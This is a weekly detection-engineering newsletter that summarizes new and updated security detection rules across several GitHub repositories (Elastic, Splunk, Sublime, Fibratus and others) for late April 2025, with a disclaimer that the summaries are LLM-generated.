This week's update highlights the most significant changes to detection rules from 8 of the 40+ monitored GitHub repositories. Between Apr 21 and Apr 28, 2025, contributors added 17 new rules and updated 94 existing ones.

Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Insights

Cloud security detection expanded significantly - Rules now target specific AWS IAM temporary session token usage (ASIA*), MFA registration attempts with these tokens, Kali Linux user agents via AWS CLI, suspicious Azure sign-ins via Visual Studio Code, large Google Workspace document downloads, and refined GCP destructive query monitoring (elastic/detection-rules, panther-labs/panther-analysis).

Windows endpoint detection addresses novel evasion and persistence - New rules identify potential NetNTLMv1 downgrade and RemoteMonologue attacks via registry monitoring, tackle advanced PowerShell obfuscation (string reordering, dynamic IEX reconstruction), detect Office execution via WMI and print monitor registry persistence, alongside broad Splunk query optimizations and Fibratus rule logic corrections (elastic/detection-rules, rabbitstack/fibratus, splunk/security_content).

macOS rule logic underwent substantial refinement - Elastic migrated numerous macOS rules to EQL for improved precision on process activity, persistence, and evasion, while osquery rules saw targeted tuning through refined process/path exclusions and specific condition adjustments (elastic/detection-rules, chainguard-dev/osquery-defense-kit).

Phishing and impersonation rules received targeted updates - Introduced IOC-based detection for a specific Valorant phishing kit and improving existing Chase/Microsoft brand impersonation rules by refining sender display name, email content, and DMARC checks (phish-report/IOK, sublime-security/sublime-rules).

Detection focus sharpens on emerging TTPs and threat intel integration - New rules specifically track Cookie-Bite attacks targeting Chrome extensions via PowerShell, monitor network connections to Proton66 C2 infrastructure, and integrate threat intelligence indicators directly into email event analysis (SlimKQL/Hunting-Queries-Detection-Rules, elastic/detection-rules).

Table Of Contents

• Corporate repositories (6)

  • sublime-security/sublime-rules (✎2)

  • phish-report/IOK (+2)

  • panther-labs/panther-analysis (✎3)

  • elastic/detection-rules (+10, ✎56)

  • splunk/security_content (✎18)

  • chainguard-dev/osquery-defense-kit (✎7)

• Personal repositories (2)

  • SlimKQL/Hunting-Queries-Detection-Rules (+3)

  • rabbitstack/fibratus (+2, ✎8)

• Feedback

• Disclaimer

• Powered by

🔔 All new rules in this issue are available for download as a STIX2 bundle JSON file:

Corporate repositories (8)

sublime-security/sublime-rules (✎2)

https://github.com/sublime-security/sublime-rules

✎ Modified rules

Improvements were made to the Chase Bank brand impersonation rule by refining detection logic concerning sender display names and portions of email content specific to Chase (Brand impersonation: Chase Bank).

The Microsoft brand impersonation rule was updated to correct a DMARC check condition. The rule now correctly compares the domain to 'office365.com', improving sender domain verification accuracy during detection processes (Brand impersonation: Microsoft with embedded logo and credential theft language).

phish-report/IOK (+2)

https://github.com/phish-report/IOK

+ New rules

Two new Sigma rules were created to identify phishing activity related to the 'valorant-7plil474' campaign. The first rule detects landing pages by identifying specific JavaScript variable identifiers. The second rule identifies the phishing kit itself, using specific URL patterns and JavaScript variable names. (Valorant Phishing Kit Landing Page 7plil474, Valorant Phishing Kit 7plil474)

panther-labs/panther-analysis (✎3)

https://github.com/panther-labs/panther-analysis

✎ Modified rules

The rule for "AWS Console Login Without MFA" was updated to change how new users are identified, replacing 'userIdentity.principalId' with 'event.udm("actor_user")'. This could affect account age tracking and logging behavior, potentially refining detection of new users, (AWS Console Login Without MFA).

A new rule named "Google Workspace Many Docs Downloaded" was introduced to track large document download activity on Google Drive. This targets excessive downloads by users that might suggest data exfiltration attempts, (Google Workspace Many Docs Downloaded).

The "GCP Destructive Queries" rule improved its title and severity classifications. It now provides specific messages for different destructive operations. Additionally, the severity classification was refined to handle 'UPDATE' and 'DELETE' operations with 'INFO' severity, while others remain as 'DEFAULT', (GCP Destructive Queries).

📰 Cybersec Feeds Overview newsletter consolidates updates from 80+ sources: government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals.

Read the latest issue

elastic/detection-rules (+10, ✎56)

https://github.com/elastic/detection-rules

+ New rules

New detections are added for potential NetNTLMv1 downgrade and RemoteMonologue attacks on Windows. The NetNTLMv1 rule monitors registry changes affecting 'LmCompatibilityLevel', while the RemoteMonologue rule identifies suspicious COM object registry modifications involving the RunAs value (Potential NetNTLMv1 Downgrade Attack, Potential RemoteMonologue Attack).

Three new PowerShell-focused detections tackle obfuscation and malicious script execution. One aggregates alerts to identify potentially harmful PowerShell scripts, another flags scripts using string reordering for obfuscation, and the last uncovers IEX command obfuscation via string methods (Potential Malicious PowerShell Based on Alert Correlation, Potential PowerShell Obfuscation via String Reordering, Dynamic IEX Reconstruction via Method String Access).

New rules are introduced for AWS-related activities. One monitors sensitive IAM API calls using temporary session tokens typically starting with 'ASIA', while another flags IAM MFA device registration attempts using such tokens. Additionally, a rule detects AWS CLI access indicating a potential malicious setup when associated with Kali Linux (AWS IAM API Calls via Temporary Session Tokens, AWS IAM Virtual MFA Device Registration Attempt with Session Token, AWS CLI with Kali Linux Fingerprint Identified).

A new Azure sign-in monitoring rule targets unusual access via Visual Studio Code. It combines Visual Studio Code-related identifiers and 'resourceDisplayName' for detecting possible phishing attacks during sign-ins (Suspicious Azure Sign-in via Visual Studio Code).

A rule to identify email threats using threat intelligence has been added. It matches email indicators with event data to spot possible threats (Threat Intel Email Indicator Match).

✎ Modified rules

Windows rules were updated to include explicit checks and improve detection accuracy. The "User Added to Privileged Group in Active Directory" rule was refined by modifying group ID checks and changing the constraint from 'winlog.api' to 'host.os.type' for filtering relevant events. The "Active Directory Group Modification by SYSTEM" and "Windows User Account Creation" rules now explicitly check the operating system type, focusing detection on intended environments to improve precision. (User Added to Privileged Group in Active Directory, Active Directory Group Modification by SYSTEM, Windows User Account Creation)

MacOS rules saw extensive updates from Kuery (KQL) to EQL, aiming to improve query syntax precision. This includes detection logic adjustments across various rules, refining logic, broadening conditions, and improving specificity with EQL syntax.(Dumping Account Hashes via Built-In Commands, Keychain CommandLine Interaction via Unsigned or Untrusted Process, SoftwareUpdate Preferences Modification, Shell Execution via Apple Scripting)

MacOS rules experienced various renaming and refinement to detection logic. For instance, the "Suspicious Installer Package Spawns Network Event" rule had its name updated and logic revised to include added process arguments, improving targeting capability. These updates focus on improving rule specificity and detection accuracy. (Suspicious Installer Package Spawns Network Event, Launch Service Creation and Immediate Loading, Potential Admin Group Account Addition)

Rules covering suspicious process activities and privilege escalations across macOS were significantly revised - often transitioning from a simple path-based approach to an EQL-based query, incorporating process, and parent process conditions. These changes focus on limiting false positives while increasing detection sharpness of unauthorized activities (Attempt to Install Root Certificate, Potential Kerberos Attack via Bifrost, Shell Execution via Apple Scripting)

The logic of several rules related to persistence and evasion tactics on macOS was refined for validity checks, scripts execution, and file modifications using EQL syntax.(Suspicious Automator Workflows Execution, Emond Rules Creation or Modification, Attempt to Enable the Root Account)

Specific rule modifications included alteration of certain query operators to 'like' or '=' in order to simplify logic and expand potential detection of threats like suspicious login items and unauthorized file path modification, focusing on activity patterns seen in typical attack vectors. (Creation of Hidden Login Item via Apple Script, Persistence via Docker Shortcut Modification, Suspicious CronTab Creation or Modification)

splunk/security_content (✎18)

https://github.com/splunk/security_content

✎ Modified rules

Multiple rules were refined to improve performance and accuracy. Changes involved reducing query complexity, optimizing field usage, and refining join operations to better associate process ids with network activities. (DLLHost with no Command Line Arguments with Network, Rundll32 with no Command Line Arguments with Network, SearchProtocolHost with no Command Line with Network, GPUpdate with no Command Line Arguments with Network)

The query logic was updated in rules, reducing complexity by improving query structuring, refining joins, and optimizing regex usage to target key fields for better detection outcomes. (Java Writing JSP File, Spoolsv Writing a DLL, Detect Outlook exe writing a zip file, Windows Phishing Outlook Drop Dll In FORM Dir, Outbound Network Connection from Java Using Default Ports)

The update simplified the search structure in multiple rules, reducing redundant fields, and improving join efficiency for better field alignment and detection accuracy. (Suspicious WAV file in Appdata Folder, Windows Office Product Dropped Cab or Inf File, Windows Defacement Modify Transcodedwallpaper File, Windows Office Product Dropped Uncommon File, Windows HTTP Network Communication From MSIExec, Windows InstallUtil Uninstall Option with Network, Windows InstallUtil Remote Network Connection)

In addition, two rules were optimized by restructuring data models and simplifying queries to focus on key fields, improving performance while minimizing the impact on false positives. (Suspicious writes to Windows Recycle Bin, Unknown Process Using The Kerberos Protocol)

chainguard-dev/osquery-defense-kit (✎7)

https://github.com/chainguard-dev/osquery-defense-kit

✎ Modified rules

The osquery rule 'Unexpected Root Process Linking Against libcurl on macOS' now focuses specifically on root processes and excludes 'docker-mac-net-connect' to prevent false positives, refining its detection scope (Unexpected Root Process Linking Against libcurl on macOS).

Multiple osquery rules were adjusted to refine their exceptions and exclusions for accuracy: the 'Unexpected programs communicating over HTTPS (state-based)' rule now excludes processes like gce, k9s, snapd, and removes some redundant exceptions; the '2-hidden-executable' rule now includes additional directories and exceptions such as '/projects', '/git', and adds exclusions to improve accuracy; the 'Unexpected Kernel Extensions on macOS' rule added a wildcard pattern for macfuse.kext directories; the 'Find unexpected executables in /var' rule includes filters for certain postfix paths, reducing irrelevant alerts from operational files (Unexpected programs communicating over HTTPS (state-based), 2-hidden-executable, Unexpected Kernel Extensions on macOS, Find unexpected executables in /var).

The osquery rule for 'Unexpected launchd scripts that use the 'program_arguments' field' now includes the exclusion of a developer ID and a pattern for 'State Tool.app' to reduce false positives, while the 'Unexpected programs listening on a TCP port' rule now has additional exceptions like 'com.docker.backend' to fine-tune the detection of unexpected network activity, (Unexpected launchd scripts that use the 'program_arguments' field, Unexpected programs listening on a TCP port).

Personal repositories (2)

SlimKQL/Hunting-Queries-Detection-Rules (+3)

https://github.com/SlimKQL/Hunting-Queries-Detection-Rules

+ New rules

A new KQL rule called 'Cookie-Bite Detection' was added to track PowerShell activity regarding the loading of new Chrome extensions, helping identify possible session token theft by monitoring file creation events and process command lines, (Cookie-Bite Detection).

A rule mapping ThreatIntelIndicator IOCs to MITRE ATT&CK techniques was introduced, focusing on 'Web Protocols' (T1071.001). It aims to improve tracking of adversary behavior with time and validity filters (Mapping Threat Intelligence to MITRE ATT&CK Using KQL).

New rule for tracking Proton66 activity was implemented. It monitors network connections from specified IP ranges linked to malicious actions (Tracking Proton66 Activity with KQL).

rabbitstack/fibratus (+2, ✎8)

https://github.com/rabbitstack/fibratus

+ New rules

Two new fibratus rules have been added. One targets Microsoft Office processes trying to execute binaries via WMI for unauthorized code execution. The other identifies registry modifications for potential print monitor or processor persistence through malicious DLLs, focusing on specific ControlSet registry paths. (Microsoft Office file execution via WMI, Potential port monitor or print processor persistence via registry modification)

✎ Modified rules

Several rules were updated to improve logical syntax for exclusions and pattern matching. These changes correct syntax errors for conditions, helping in accurately excluding specific items or paths. The changes ensure intended logic is executed effectively. Rules benefiting from these updates include those focusing on file access to SAM databases, potential process injection via tainted memory section, potential thread execution hijacking, potential process hollowing, and process spawned from macro-enabled Microsoft Office documents. The improvements target "not ... imatches" errors across various scenarios. (File access to SAM database, Potential process injection via tainted memory section, Potential thread execution hijacking, Potential Process Hollowing, Process spawned from macro-enabled Microsoft Office document)

The "Credential discovery via VaultCmd tool" rule was updated to broaden coverage by switching command-line matching to a more generic 'list' capturing different usage scenarios. Improvements also included metadata descriptions for contextual clarity. (Credential discovery via VaultCmd tool)

The "Macro execution via script interpreter" rule saw updates in its condition logic to target the image path rather than just the image name, increasing accuracy. The minimum engine version requirement was also updated from 2.2.0 to 2.4.0. (Macro execution via script interpreter)

The "Unsigned DLL injection via remote thread" rule underwent a version update from 1.1.0 to 1.1.1 following corrections to the image.path not imatches syntax for improved detection accuracy. (Unsigned DLL injection via remote thread)

What SIEM are you using? Tell us!

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.

Disclaimer

The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.